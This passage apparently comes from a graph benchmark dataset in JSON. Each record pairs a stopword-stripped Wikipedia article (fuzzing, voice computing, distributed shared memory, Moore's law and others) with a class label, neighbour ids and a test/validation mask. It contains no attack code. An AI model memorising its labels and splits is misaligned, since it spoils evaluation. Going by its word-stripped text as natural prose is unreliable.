software source code tools test procedures raw result data made publicly available later term fuzzing limited command-line utilities 1991 crashme tool released intended test robustness unix unix-like operating systems executing random machine instructions 1995 fuzzer used test gui-based tools x window system network protocols system library apis april 2012 google announced clusterfuzz cloud-based fuzzing infrastructure security-critical components chromium web browser security researchers upload fuzzers collect bug bounties clusterfuzz finds crash uploaded fuzzer september 2014 shellshock disclosed family security bugs widely used unix bash shell vulnerabilities shellshock found using fuzzer afl many internet-facing services web server deployments use bash process certain requests allowing attacker cause vulnerable versions bash execute arbitrary commands allow attacker gain unauthorized access computer system april 2015 hanno böck showed fuzzer afl could found 2014 heartbleed vulnerability heartbleed vulnerability disclosed april 2014 serious vulnerability allows adversaries decipher otherwise encrypted communication vulnerability accidentally introduced openssl implements tls used majority servers internet shodan reported 238,000 machines still vulnerable april 2016 200,000 january 2017 august 2016 defense advanced research projects agency darpa held finals first cyber grand challenge fully automated capture-the-flag competition lasted 11 hours objective develop automatic defense systems discover exploit correct software flaws real-time fuzzing used effective offense strategy discover flaws software opponents showed tremendous potential automation vulnerability detection winner system called mayhem developed team forallsecure led david brumley september 2016 microsoft announced project springfield cloud-based fuzz testing service finding security critical bugs software december 2016 google announced oss-fuzz allows continuous fuzzing several security-critical open-source projects black hat 2018 christopher domas demonstrated use fuzzing expose existence hidden risc core processor core able bypass existing security checks execute ring 0 commands ring 3 fuzzer categorized follows mutation-based fuzzer leverages existing corpus seed inputs fuzzing generates inputs modifying rather mutating provided seeds example fuzzing image library libpng user would provide set valid png image files seeds mutation-based fuzzer would modify seeds produce semi-valid variants seed corpus seed files may contain thousands potentially similar inputs automated seed selection test suite reduction allows users pick best seeds order maximize total number bugs found fuzz campaign generation-based fuzzer generates inputs scratch instance smart generation-based fuzzer takes input model provided user generate new inputs unlike mutation-based fuzzers generation-based fuzzer depend existence quality corpus seed inputs fuzzers capability generate inputs scratch generate inputs mutation existing seeds typically fuzzers used generate inputs programs take structured inputs file sequence keyboard mouse events sequence messages structure distinguishes valid input accepted processed program invalid input quickly rejected program constitutes valid input may explicitly specified input model examples input models formal grammars file formats gui-models network protocols even items normally considered input fuzzed contents databases shared memory environment variables precise interleaving threads effective fuzzer generates semi-valid inputs valid enough directly rejected parser invalid enough might stress corner cases exercise interesting program behaviours smart model-based grammar-based protocol-based fuzzer leverages input model generate greater proportion valid inputs instance input modelled abstract syntax tree smart mutation-based fuzzer would employ random transformations move complete subtrees one node another input modelled formal grammar smart generation-based fuzzer would instantiate production rules generate inputs valid respect grammar however generally input model must explicitly provided difficult model proprietary unknown complex large corpus valid invalid inputs available grammar induction technique angluin l* algorithm would able generate input model dumb fuzzer require input model thus employed fuzz wider variety programs instance afl dumb mutation-based fuzzer modifies seed file flipping random bits substituting random bytes interesting values moving deleting blocks data however dumb fuzzer might generate lower proportion valid inputs stress parser code rather main components program disadvantage dumb fuzzers illustrated means construction valid checksum cyclic redundancy check crc crc error-detecting code ensures integrity data contained input file preserved transmission checksum computed input data recorded file program processes received file recorded checksum match re-computed checksum file rejected invalid fuzzer unaware crc unlikely generate correct checksum however attempts identify re-compute potential checksum mutated input dumb mutation-based fuzzer modified protected data typically fuzzer considered effective achieves higher degree code coverage rationale fuzzer exercise certain structural elements program also able reveal bugs hiding elements program elements considered critical others instance division operator might cause division zero error system call may crash program black-box fuzzer treats program black box unaware internal program structure instance random testing tool generates inputs random considered blackbox fuzzer hence blackbox fuzzer execute several hundred inputs per second easily parallelized scale programs arbitrary size however blackbox fuzzers may scratch surface expose shallow bugs hence attempts develop blackbox fuzzers incrementally learn internal structure behavior program fuzzing observing program output given input instance learnlib employs active learning generate automaton represents behavior web application white-box fuzzer leverages program analysis systematically increase code coverage reach certain critical program locations instance sage leverages symbolic execution systematically explore different paths program program specification available whitebox fuzzer might leverage techniques model-based testing generate inputs check program outputs program specification whitebox fuzzer effective exposing bugs hide deep program however time used analysis program specification become prohibitive whitebox fuzzer takes relatively long generate input blackbox fuzzer efficient hence attempts combine efficiency blackbox fuzzers effectiveness whitebox fuzzers gray-box fuzzer leverages instrumentation rather program analysis glean information program instance afl libfuzzer utilize lightweight instrumentation trace basic block transitions exercised input leads reasonable performance overhead informs fuzzer increase code coverage fuzzing makes gray-box fuzzers extremely efficient vulnerability detection tools fuzzing used mostly automated technique expose vulnerabilities security-critical programs might exploited malicious intent generally fuzzing used demonstrate presence bugs rather absence running fuzzing campaign several weeks without finding bug prove program correct program may still fail input executed yet executing program inputs prohibitively expensive objective prove program correct inputs formal specification must exist techniques formal methods must used order expose bugs fuzzer must able distinguish expected normal unexpected buggy program behavior however machine always distinguish bug feature automated software testing also called test oracle problem typically fuzzer distinguishes crashing non-crashing inputs absence specifications use simple objective measure crashes easily identified might indicate potential vulnerabilities e.g. denial service arbitrary code execution however absence crash indicate absence vulnerability instance program written c may may crash input causes buffer overflow rather program behavior undefined make fuzzer sensitive failures crashes sanitizers used inject assertions crash program failure detected different sanitizers different kinds bugs fuzzing also used detect differential bugs reference implementation available automated regression testing generated inputs executed two versions program automated differential testing generated inputs executed two implementations program e.g. lighttpd httpd implementations web server two variants produce different output input one may buggy examined closely static program analysis analyzes program without actually executing might lead false positives tool reports problems program actually exist fuzzing combination dynamic program analysis used try generate input actually witnesses reported problem modern web browsers undergo extensive fuzzing chromium code google chrome continuously fuzzed chrome security team 15,000 cores microsoft edge internet explorer microsoft performed fuzzed testing 670 machine-years product development generating 400 billion dom manipulations 1 billion html files fuzzer produces large number inputs relatively short time instance 2016 google oss-fuzz project produced around 4 trillion inputs week hence many fuzzers provide toolchain automates otherwise manual tedious tasks follow automated generation failure-inducing inputs automated bug triage used group large number failure-inducing inputs root cause prioritize individual bug severity fuzzer produces large number inputs many failure-inducing ones may effectively expose software bug bugs security-critical patched higher priority instance cert coordination center provides linux triage tools group crashing inputs produced stack trace lists group according probability exploitable microsoft security research centre msec developed exploitable tool first creates hash crashing input determine uniqueness assigns exploitability rating previously unreported triaged bugs might automatically reported bug tracking system instance oss-fuzz runs large-scale long-running fuzzing campaigns several security-critical software projects previously unreported distinct bug reported directly bug tracker oss-fuzz bug tracker automatically informs maintainer vulnerable software checks regular intervals whether bug fixed recent revision using uploaded minimized failure-inducing input automated input minimization test case reduction automated debugging technique isolate part failure-inducing input actually inducing failure failure-inducing input large mostly malformed might difficult developer understand exactly causing bug given failure-inducing input automated minimization tool would remove many input bytes possible still reproducing original bug instance delta debugging automated input minimization technique employs extended binary search algorithm find minimal input",
    "neighbors": [
      2432,
      6274,
      5636,
      7940,
      10756,
      9356,
      10894,
      3473,
      8978,
      4755,
      1429,
      5245,
      5397,
      10392,
      5373,
      5246,
      1179,
      4892,
      2717,
      5404,
      2975,
      7325,
      1954,
      3619,
      5282,
      2213,
      5029,
      7847,
      6184,
      7337,
      8488,
      939,
      8998,
      3629,
      814,
      3887,
      7855,
      9391,
      1970,
      5682,
      9646,
      5433,
      3643,
      7228,
      7101,
      2878,
      3262,
      576,
      7739,
      1474,
      9791,
      3525,
      1094,
      8773,
      7368,
      9160,
      11333,
      5325,
      2901,
      9688,
      3419,
      7515,
      3941,
      4326,
      6373,
      2152,
      107,
      11244,
      4720,
      5744,
      4980,
      5492,
      2041,
      10492,
      2045,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 2263,
    "label": 0,
    "text": "Voice_computing:voice computing voice computing discipline develops hardware software process voice inputs spans many fields including human-computer interaction conversational computing linguistics natural language processing automatic speech recognition speech synthesis audio engineering digital signal processing cloud computing data science ethics law information security voice computing become increasingly significant modern times especially advent smart speakers like amazon echo google assistant shift towards serverless computing improved accuracy speech recognition text-to-speech models voice computing rich history first scientists like wolfgang kempelen started build speech machines produce earliest synthetic speech sounds led work thomas edison record audio dictation machines play back corporate settings 1950s-1960s primitive attempts build automated speech recognition systems bell labs ibm others however 1980s hidden markov models used recognize 1,000 words speech recognition systems became relevant around 2011 siri emerged apple iphones first voice assistant accessible consumers innovation led dramatic shift building voice-first computing architectures ps4 released sony north america 2013 70+ million devices amazon released amazon echo 2014 30+ million devices microsoft released cortana 2015 400 million windows 10 users google released google assistant 2016 2 billion active monthly users android phones apple released homepod 2018 500,000 devices sold 1 billion devices active ios/siri shifts along advancements cloud infrastructure e.g amazon web services codecs solidified voice computing field made widely relevant public large voice computer assembled hardware software process voice inputs note voice computers necessarily need screen traditional amazon echo embodiments traditional laptop computers mobile phones could used voice computers moreover become increasingly interfaces voice computers advent iot-enabled devices within cars televisions september 2018 currently 20,000 types devices compatible amazon alexa voice computing software read/write record clean encrypt/decrypt playback transcode transcribe compress publish featurize model visualize voice files popular software packages related voice computing voice computing applications span many industries including voice assistants healthcare e-commerce finance supply chain agriculture text-to-speech security marketing customer support recruiting cloud computing microphones speakers podcasting voice technology projected grow cagr 19-25 2025 making attractive industry startups investors alike united states states varying telephone call recording laws states legal record conversation consent one party others consent parties required moreover coppa significant law protect minors using internet increasing number minors interacting voice computing devices e.g amazon alexa federal trade commission recently relaxed copaa rule children issue voice searches commands lastly gdpr new european law governs right forgotten many clauses eu citizens gdpr also clear companies need outline clear measures obtain consent audio recordings made define purpose scope recordings used e.g. training purposes bar valid consent raised gdpr consents must freely given specific informed unambiguous tacit consent longer sufficient many research conferences relate voice computing include google assistant roughly 2,000 actions january 2018 50,000 alexa skills worldwide september 2018 june 2017 google released audioset large-scale collection human-labeled 10-second sound clips drawn youtube videos contains 1,010,480 videos human speech files 2,793.5 hours total released part ieee icassp 2017 conference november 2017 mozilla foundation released common voice project collection speech files help contribute larger open source machine learning community voicebank currently 12gb size 500 hours english-language voice data collected 112 countries since project inception june 2017 dataset already resulted creative projects like deepspeech model open source transcription model",
    "neighbors": [
      4194,
      4995,
      7780,
      3533,
      7887,
      4624,
      7248,
      7537,
      10557,
      8921,
      3323,
      5373
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2264,
    "label": 7,
    "text": "Distributed_shared_memory:distributed shared memory computer science distributed shared memory dsm form memory architecture physically separated memories addressed one logically shared address space term shared mean single centralized memory address space shared physical address two processors refers location memory distributed global address space dgas similar term wide class software hardware implementations node cluster access shared memory addition node non-shared private memory distributed-memory system often called multicomputer consists multiple independent processing nodes local memory modules connected general interconnection network software dsm systems implemented operating system programming library thought extensions underlying virtual memory architecture implemented operating system systems transparent developer means underlying distributed memory completely hidden users contrast software dsm systems implemented library language level transparent developers usually program differently however systems offer portable approach dsm system implementations distributed shared memory system implements shared-memory model physically distributed memory system usually two methods achieving distributed shared memory three ways implementing software distributed shared memory software dsm systems also flexibility organize shared memory region different ways page based approach organizes shared memory pages fixed size contrast object based approach organizes shared memory region abstract space storing shareable objects variable sizes another commonly seen implementation uses tuple space unit sharing tuple shared memory architecture may involve separating memory shared parts distributed amongst nodes main memory distributing memory nodes coherence protocol chosen accordance consistency model maintains memory coherence memory coherence necessary system organizes dsm able track maintain state data blocks nodes across memories comprising system basic dsm track least three states among nodes given block directory state dictate block uncached u state dictate block exclusively owned modified owned em state dictate block shared blocks come directory organization transition u em ownership state initial node state transition nodes begin reading block two primary methods allowing system track blocks cached condition across node home-centric request-response uses home service requests drive states whereas requester-centric allows node drive manage requests home home-centric system dsm avoid handle request-response races nodes allowing one transaction occur time home node decided transaction finished—usually home received responding processor response request example intel qpi home-source mode requester-centric system dsm allow nodes talk home means multiple nodes attempt start transaction requires additional considerations ensure coherence example one node processing block receives request block another node send nack negative acknowledgement tell initiator processing node ca n't fulfill request right away example intel qpi snoop-source mode dsm must follow certain rules maintain consistency read write order viewed among nodes called system consistency model suppose n processes mi memory operations process operations executed sequentially conclude m1 m2 … mn m1 m2 … mn possible interleaves operations issue conclusion determining correctness interleaved operations memory coherence dsm defines interleaves permitted two type replication algorithm read replication write replication read replication multiple nodes read time one node write write application multiple nodes read write time.the write requests handled sequencer replication shared data general tends however preserving coherence consistency may become challenging",
    "neighbors": [
      8447,
      7942,
      3594,
      785,
      7313,
      7699,
      11539,
      3863,
      5272,
      1049,
      7963,
      6815,
      2210,
      5798,
      9126,
      6184,
      2345,
      4909,
      7983,
      50,
      7218,
      10675,
      8501,
      5948,
      4286,
      2113,
      8514,
      10051,
      5956,
      8901,
      4423,
      1480,
      6909,
      330,
      1866,
      7497,
      8523,
      2383,
      4308,
      2008,
      344,
      2394,
      731,
      2140,
      2264,
      3801,
      5464,
      11487,
      4194,
      5090,
      11618,
      7142,
      5223,
      2536,
      8810,
      4205,
      118,
      6774,
      7802,
      508,
      3197,
      4351
    ],
    "mask": "Test"
  },
  {
    "node_id": 2265,
    "label": 4,
    "text": "Rotational_cryptanalysis:rotational cryptanalysis cryptography rotational cryptanalysis generic cryptanalytic attack algorithms rely three operations modular addition rotation xor — arx short algorithms relying operations popular relatively cheap hardware software run constant time making safe timing attacks common implementations basic idea rotational cryptanalysis bit rotation xor operations preserve correlations bit-rotated pairs inputs addition bit-rotated inputs also partially preserves bit rotation correlations rotational pairs inputs thus used see cipher cascaded arx operations greater degree might expected ability see correlations rounds processing exploited break cipher way similar differential cryptanalysis term rotational cryptanalysis coined dmitry khovratovich ivica nikolić 2010 paper rotational cryptanalysis arx presented best cryptanalytic attacks time reduced-round threefish cipher — part skein hash function sha-3 competition candidate follow-up attack authors christian rechberger breaks collision resistance 53 72 rounds skein-256 57 72 rounds skein-512 also affects threefish cipher",
    "neighbors": [
      7556,
      2567,
      3084,
      2957,
      7056,
      658,
      660,
      1173,
      1941,
      4128,
      1315,
      4389,
      10662,
      169,
      11185,
      2357,
      10806,
      1847,
      9528,
      2110,
      9541,
      10315,
      6863,
      8273,
      7635,
      212,
      9556,
      10963,
      11349,
      7643,
      9697,
      8674,
      229,
      618,
      1898,
      881,
      1654,
      7161,
      7034,
      892
    ],
    "mask": "Test"
  },
  {
    "node_id": 2266,
    "label": 2,
    "text": "NewWave:newwave newwave discontinued object-oriented graphical desktop environment office productivity tool pcs running early versions microsoft windows beginning 2.0 developed hewlett-packard introduced commercially 1988 used hp vectras ibm compatible pcs running ms windows user perspective newwave ran top ms windows completely replaced standard windows desktop program manager user interface object-oriented desktop interface hp promoted newwave release windows 95 time development product ceased due incompatibility new operating system newwave gui together contemporaneous nextstep gui introduced shaded 3-d look feel later widely adopted hp encouraged independent software vendors produce versions applications took advantage newwave functionality allowing data handled objects instead files one early example samna corporation later acquired lotus produced edition microsoft windows word processor ami pro entitled ‘ ’ ami pro newwave ’ ’ june 20 1988 microsoft corporation hewlett-packard issued press release announcing inclusion newwave support up-coming release microsoft excel newwave featured icons scheduled scripts form agents hot connects hp incorporated newwave multi-platform office automation offerings running proprietary mpe hp-ux unix minicomputer operating systems developed newwave versions key email database document management personal productivity communications network management tools branded related solutions “ hp newwave office ” banner prior integration hp newwave solution set known “ business system plus ” “ newwave office ” term used previously describe main newwave user desktop original november 1987 press release hewlett-packard described newwave “ application environment designed provide personal computer users single method access data files multiple sources company ’ network ” developed hp ’ personal software division psd santa clara california united states part distributed computing environment strategy three years work 100 employees original version newwave ran ibm compatible pcs required ms-dos 3.2 later ms-windows 2.0 later key features newwave included hp described omf means binding applications data together form “ objects ” compound documents addition ms-windows-style indexed help articles newwave introduced context-sensitive help facility allowed user click ‘ help ’ menu option added query symbol mouse arrow switched ‘ help mode ’ user could click part newwave environment menu command help item displayed pop-up window working conjunction newwave agent computer-based training functionality newwave allowed developers build interactive lessons desktop environment applications allowed users learn actual live applications non-destructive way feature dropped later versions newwave due increased disk requirements imposed limited hard disk space available pcs time newwave agent task-recording execution facility could work across multiple applications users could record sequence tasks performed within newwave environment recorded tasks generated basic-like source-code could repeated unmodified edited expanded create sophisticated automated interactive activities newwave included built-in applications fully integrated object management facility newwave agent online help computer based training features non-native newwave applications could integrated environment using “ advanced bridges ” allowing live data embedded compound documents standard end-user version hp newwave included bridges hp ’ pc applications hp graphics gallery ms windows tools calculator calendar notepad etc many common third-party applications users could also create bridges applications using included bridge builder tool bridges could exported use newwave-enabled systems often shared amongst newwave user community hp described newwave write basic-to-intermediate level “ see get ” wysiwig word processor support compound documents newwave mail available separate native newwave product could act client hp ’ proprietary deskmanager openmail email server solutions hp succeeded establishing third-party developer program following release newwave software developer ’ kit sdk february 1988 newwave enabled third-party applications included third-party application bridges shipped end-user release hp newwave included eight-year life hp newwave underwent several functional cosmetic changes including revision desktop interface dropping built-in computer based training facility alleged similarities macintosh gui newwave subject unsuccessful look feel lawsuit apple see apple v. microsoft praising hp serious sincere effort give windows complete object-oriented gui stewart alsop ii 1988 doubted software developers would create software newwave hp considered standard setter ibm microsoft desktop-metaphor plans existing applications needed substantial redesign rewrite effectively use hp newwave never adopted mainstream end-user environment although adopted number corporate clients basis office productivity projects including hp success licensing newwave hardware manufacturers january 1990 hp stated intention provide newwave capabilities unix motif os/2 presentation manager although versions never released hp contribute newwave technology projects run open software foundation hp member articles august 1989 issue hewlett-packard journal volume 40 number 4",
    "neighbors": [
      576,
      5384,
      6797,
      7983,
      6129,
      5492
    ],
    "mask": "Test"
  },
  {
    "node_id": 2267,
    "label": 7,
    "text": "CloudMe:cloudme cloudme file storage service operated cloudme ab offers cloud storage file synchronization client software features blue folder appears devices content files synchronized devices cloudme service offered freemium business model provides encrypted ssl connection ssl extended validation certificate cloudme provides client software microsoft windows macos linux android ios google tv samsung smart tv wd tv windows storage server nas web browsers cloud sync storage provider cloudme strong focus european market differentiates storage providers mobility media features like samsung smarttv support recently novell announced support cloudme service dynamic file services suite novosoft handy backup version 7.3 also announced support cloudme winzip also integrated cloudme many third party mobile apps software available cloudme many using webdav support cloudme cloudme founded daniel arthursson 2012 mainly owned xcerion company runs servers operates sweden european union 2012 cloudme received red herring top 100 global company alwayson global 250 award white bull 2012 yearling award white bull 2014 longhorn award previously cloudme.com called icloud.com service changed name apple acquired domain trademark rumoured 4.5 million dollars visitors icloud.com directed cloudme.com name change former icloud.com service split two companies services cloudme file sync storage cloudtop virtual cloud desktop previously main attraction icloud.com service included file storage xcerion major owner cloudme cloudtop initially gained investment 12 million build icloud service using saas model cloudme service provided free version 3 gb storage 19 gb referral program model often called freemium premium versions either 10 25 100 200 500 gb storage consumers 2 tb 5 tb business closest competitor cloudme dropbox cloudme features cloud storage sync solution allows users store access share content people outside service sharing done email text messaging facebook google files stored blue folder synchronized connected computers devices web desktop cloud os service called cloudtop.com available uses cloudme internet file system cloudme ab located drottninggatan 23 linköping sweden",
    "neighbors": [
      4869,
      2694,
      4490,
      6797,
      4623,
      5650,
      6565,
      7983,
      10161,
      9394,
      823,
      7238,
      10054,
      10185,
      1239,
      735,
      4710,
      4970,
      8446
    ],
    "mask": "Test"
  },
  {
    "node_id": 2268,
    "label": 7,
    "text": "Procurify:procurify procurify cloud-based procurement software company located vancouver british columbia canada founded 2013 ceo aman mann cto eugene dong coo kenneth loi procurify main product offering cloud-based procurement solution used manage company spending companies offer procurement solutions typically focus automation company spending real-time current procurify platform considered horizontal rather industry specific procurify cloud based procurement software solution used companies manage organizational purchasing procurement like e-procurement solutions available procurify focuses providing users features including digital purchase order submission accounts payable automation procurify hosted amazon web services built using django solution available saas procurify offered browser-based mobile procurement software company founders bcit school business alumni graduated together operations management 2011 idea procurify came bcit class project founders randomly placed together consult vancouver-based business internal processes november 2012 joined growlab accelerator program february 2013 procurify graduated vancouver-based incubator program growlab april 2014 procurify raised total 1.2 million seed round venture capitalists nexus ventures bdc mark cuban july 2015 procurify raised another seed round totaling 4 million point nine capital nexus venture partners business development bank canada bdc hootsuite ceo ryan holmes chief revenue officer steve johnson also participated round",
    "neighbors": [
      7248
    ],
    "mask": "None"
  },
  {
    "node_id": 2269,
    "label": 3,
    "text": "SPARC_T5:sparc t5 sparc t5 fifth generation multicore microprocessor oracle sparc t-series family first presented hot chips 24 august 2012 officially introduced oracle sparc t5 servers march 2013 processor designed offer high multithreaded performance 16 cores per chip 8 threads per core well high single threaded performance chip processor uses sparc s3 core design predecessor sparc t4 processor implemented 28 nm process runs 3.6 ghz s3 core dual-issue core uses dynamic threading out-of-order execution incorporates one floating point unit one dedicated cryptographic unit per core 64-bit sparc version 9 based processor 16 cores supporting 128 threads per processor scales 1,024 threads 8 socket system changes include support pcie version 3.0 new cache coherence protocol chart shows differences t5 t4 processor chips sparc t5 also introduces new power management feature consists hardware support processor software allows system administrator use feature users select policy system responds over-temperature over-current events dynamic voltage frequency scaling aka dvfs policy set maintain peak frequency trade performance power consumption sparc t5 processor used oracle entry mid-size sparc t5-2 t5-4 t5-8 servers servers use processor frequency number cores per chip cache configuration t5 processor includes crossbar network connects 16 cores l2 caches shared l3 cache multiprocessor cache coherence maintained using directory-based protocol design scales eight sockets without additional silicon glueless snoopy based protocol used sparc t4 systems replaced order reduce memory latency reduce coherency bandwidth consumption",
    "neighbors": [
      5378,
      1539,
      9090,
      9731,
      1801,
      4235,
      6926,
      1809,
      4241,
      1818,
      8863,
      8353,
      8871,
      1707,
      2731,
      5677,
      10926,
      3247,
      6322,
      9010,
      9012,
      1461,
      10675,
      4664,
      10553,
      1594,
      4285,
      6464,
      7104,
      6338,
      9665,
      6341,
      9541,
      2895,
      3919,
      597,
      731,
      1755,
      6107,
      1250,
      9955,
      10340,
      7270,
      11626,
      1260,
      7022,
      10734,
      1776,
      8434,
      11636,
      630,
      1399,
      1788
    ],
    "mask": "Test"
  },
  {
    "node_id": 2270,
    "label": 1,
    "text": "EUROCAT_(medicine):eurocat medicine eurocat european organization describes network population-based registries epidemiological surveillance congenital anomalies covering 1.5 million births 20 countries europe founded 1979 goal improving collection data congenital disorders standardization data published extensions helps provide unique codes individual conditions approximately quarter new births european union reported eurocat",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 2271,
    "label": 1,
    "text": "Terminology_model:terminology model terminology model refinement concept system within terminology model concepts object types specific problem subject area defined subject matter experts terms concept object type definitions definitions subordinated concepts characteristics properties besides object types terminology model allows defining hierarchical classifications definitions object type property behavior definition casual relations terminology model means subject matter experts express knowledge subject subject specific terms since terminology model structured rather similar object-oriented database schema transformed without loss information object-oriented database schema thus terminology model method problem analysis one side mean defining database schema side several terminology models developed published field statistics",
    "neighbors": [
      7331
    ],
    "mask": "None"
  },
  {
    "node_id": 2272,
    "label": 9,
    "text": "Ralph_Griswold:ralph griswold ralph e. griswold may 19 1934 modesto ca – october 4 2006 tucson az computer scientist known research high-level programming languages symbolic computation language credits include string processing language snobol sl5 icon attended stanford university receiving bachelor degree physics m.s ph.d. electrical engineering griswold went bell labs 1962 studied ideas non-numerical computation snobol outcome radically different language time still became head labs programming research development department 1967 1971 hired university arizona first professor computer science subsequently organized department head 1981 arizona griswold developed icon earlier ratfor implementation icon discarded language rewritten scratch c unix 1990 griswold appointed regents professor retired 1995 one founders bell labs software culture spawned unix c many essential contributions modern software ralph griswold brought academic research brilliance also experience value system demanded research ideas tested fire proven useful usable real users good-looking diagrams academic papers retirement interests turned mathematical aspects weaving griswold died october 4 2006 cancer griswold son bill griswold also computer scientist",
    "neighbors": [
      10569,
      8057,
      8262
    ],
    "mask": "None"
  },
  {
    "node_id": 2273,
    "label": 3,
    "text": "Moore's_law:moore law moore law observation number transistors dense integrated circuit doubles every two years observation named gordon moore co-founder fairchild semiconductor ceo intel whose 1965 paper described doubling every year number components per integrated circuit projected rate growth would continue least another decade 1975 looking forward next decade revised forecast doubling every two years compound annual growth rate cagr 41.4 period often quoted 18 months prediction intel executive david house combination effect transistors transistors faster moore prediction proved accurate several decades used semiconductor industry guide long-term planning set targets research development r advancements digital electronics strongly linked moore law rapid scaling mosfet metal-oxide-semiconductor field-effect transistor devices quality-adjusted microprocessor prices memory capacity ram flash sensors even number size pixels digital cameras digital electronics contributed world economic growth late twentieth early twenty-first centuries moore law describes driving force technological social change productivity economic growth moore law observation projection historical trend physical natural law although rate held steady 1975 around 2012 rate faster first decade general logically sound extrapolate historical growth rate indefinite future example 2010 update international technology roadmap semiconductors predicted growth would slow around 2013 2015 gordon moore foresaw rate progress would reach saturation see moore law dying next decade intel stated 2015 pace advancement slowed starting 22 nm feature width around 2012 continuing 14 nm brian krzanich former ceo intel announced cadence today closer two half years two intel also stated 2017 hyperscaling would able continue trend moore law offset increased cadence aggressively scaling beyond typical doubling transistors krzanich cited moore 1975 revision precedent current deceleration results technical challenges natural part history moore law late 2010s two semiconductor manufacturers able produce semiconductor nodes keep pace moore law tsmc samsung electronics 10 nm 7 nm 5 nm nodes production plans 3 nm nodes whereas pace slowed intel semiconductor manufacturers 1959 douglas engelbart discussed projected downscaling integrated circuit size article microelectronics art similitude engelbart presented ideas 1960 international solid-state circuits conference moore present audience thirty-fifth anniversary issue electronics magazine published april 19 1965 gordon e. moore working director research development fairchild semiconductor time asked predict going happen semiconductor components industry next ten years response brief article entitled cramming components onto integrated circuits within editorial speculated 1975 would possible contain many 65,000 components single quarter-inch semiconductor complexity minimum component costs increased rate roughly factor two per year certainly short term rate expected continue increase longer term rate increase bit uncertain although reason believe remain nearly constant least 10 years reasoning log-linear relationship device complexity higher circuit density reduced cost time 1975 ieee international electron devices meeting moore revised forecast rate semiconductor complexity would continue double annually 1980 would decrease rate doubling approximately every two years outlined several contributing factors exponential behavior shortly 1975 caltech professor carver mead popularized term moore law despite popular misconception moore adamant predict doubling every 18 months rather david house intel colleague factored increasing performance transistors conclude integrated circuits would double performance every 18 months moore law came widely accepted goal industry cited competitive semiconductor manufacturers strove increase processing power moore viewed eponymous law surprising optimistic moore law violation murphy law everything gets better better observation even seen self-fulfilling prophecy however rate improvement physical dimensions known dennard scaling mosfet scaling slowed semiconductor manufacturers recent years much industry shifting circa 2016 using semiconductor scaling driver focus meeting needs major computing applications april 2005 intel offered us 10,000 purchase copy original electronics issue moore article appeared engineer living united kingdom first find copy offer intel late 2010s two semiconductor manufacturers able produce semiconductor nodes keep pace moore law tsmc samsung electronics 10 nm 7 nm 5 nm nodes production plans 3 nm nodes whereas pace slowed intel semiconductor manufacturers cost computer power consumer falls cost producers fulfill moore law follows opposite trend r manufacturing test costs increased steadily new generation chips rising manufacturing costs important consideration sustaining moore law led formulation moore second law also called rock law capital cost semiconductor fab also increases exponentially time numerous innovations scientists engineers sustained moore law since beginning integrated circuit ic era key innovations listed examples breakthroughs advanced integrated circuit semiconductor device fabrication technology allowing transistor counts grow seven orders magnitude less five decades computer industry technology road maps predicted 2001 moore law would continue several generations semiconductor chips depending doubling time used calculations could mean hundredfold increase transistor count per chip within decade semiconductor industry technology roadmap used three-year doubling time microprocessors leading tenfold increase decade intel reported 2005 stating downsizing silicon chips good economics could continue following decade 2008 predicting trend 2029 one key challenges engineering future nanoscale transistors design gates device dimension shrinks controlling current flow thin channel becomes difficult compared finfets gate dielectric three sides channel gate-all-around mosfet gaafet structure even better gate control new technology advances may help sustain moore law improved performance without reduced feature size physical limits transistor scaling source-to-drain leakage limited gate metals limited options channel material reached new avenues continued scaling open promising approaches rely using spin state electron spintronics tunnel junctions advanced confinement channel materials via nano-wire geometry comprehensive list available device choices shows wide range device options open continuing moore law next decades spin-based logic memory options developed actively industrial labs well academic labs vast majority current transistors ics composed principally doped silicon alloys silicon fabricated single nanometer transistors short-channel effects adversely change desired material properties silicon functional transistor several non-silicon substitutes fabrication small nanometer transistors one proposed material indium gallium arsenide ingaas compared silicon germanium counterparts ingaas transistors promising future high-speed low-power logic applications intrinsic characteristics iii-v compound semiconductors quantum well tunnel effect transistors based ingaas proposed alternatives traditional mosfet designs research also showing biological micro-cells capable impressive computational power energy efficient various forms graphene studied graphene electronics eg graphene nanoribbon transistors shown great promise since appearance publications 2008 bulk graphene band gap zero thus used transistors constant conductivity inability turn zigzag edges nanoribbons introduce localized energy states conduction valence bands thus bandgap enables switching fabricated transistor example typical gnr width 10 nm desirable bandgap energy 0.4ev research need performed however sub 50 nm graphene layers resistivity value increases thus electron mobility decreases semiconductor industry forecasters including gordon moore expect moore law end around 2025 april 2005 gordon moore stated interview projection sustained indefinitely ca n't continue forever nature exponentials push eventually disaster happens also noted transistors eventually would reach limits miniaturization atomic levels 2016 international technology roadmap semiconductors using moore law drive industry since 1998 produced final roadmap longer centered research development plan moore law instead outlined might called moore strategy needs applications drive chip development rather focus semiconductor scaling application drivers range smartphones ai data centers new initiative generalized roadmapping started ieee initiative rebooting computing named international roadmap devices systems irds technological change combination better technology 2011 study journal science showed peak rate change world capacity compute information 1998 world technological capacity compute information general-purpose computers grew 88 per year since technological change clearly slowed recent times every new year allowed humans carry roughly 60 computation possibly could executed existing general-purpose computers year still exponential shows rate technological change varies time primary driving force economic growth growth productivity moore law factors productivity moore 1995 expected rate technological progress going controlled financial realities reverse could occur around late-1990s however economists reporting productivity growth key economic indicator innovation acceleration rate semiconductor progress contributed surge u.s. productivity growth reached 3.4 per year 1997–2004 outpacing 1.6 per year 1972–1996 2005–2013 economist richard g. anderson notes numerous studies traced cause productivity acceleration technological innovations production semiconductors sharply reduced prices components products contain well expanding capabilities products alternative source improved performance microarchitecture techniques exploiting growth available transistor count out-of-order execution on-chip caching prefetching reduce memory latency bottleneck expense using transistors increasing processor complexity increases described empirically pollack rule states performance increases due microarchitecture techniques approximate square root complexity number transistors area processor years processor makers delivered increases clock rates instruction-level parallelism single-threaded code executed faster newer processors modification manage cpu power dissipation processor makers favor multi-core chip designs software written multi-threaded manner take full advantage hardware many multi-threaded development paradigms introduce overhead see linear increase speed vs number processors particularly true accessing shared dependent resources due lock contention effect becomes noticeable number processors increases cases roughly 45 increase processor transistors translated roughly 10–20 increase processing power hand processor manufacturers taking advantage 'extra space transistor shrinkage provides add specialized processing units deal features graphics video cryptography one example intel parallel javascript extension adds support multiple cores also non-general processing features chips part migration client side scripting toward html5 negative implication moore law obsolescence technologies continue rapidly improve improvements may significant enough render predecessor technologies obsolete rapidly situations security survivability hardware data paramount resources limited rapid obsolescence may pose obstacles smooth continued operations toxic materials used production modern computers obsolescence properly managed may 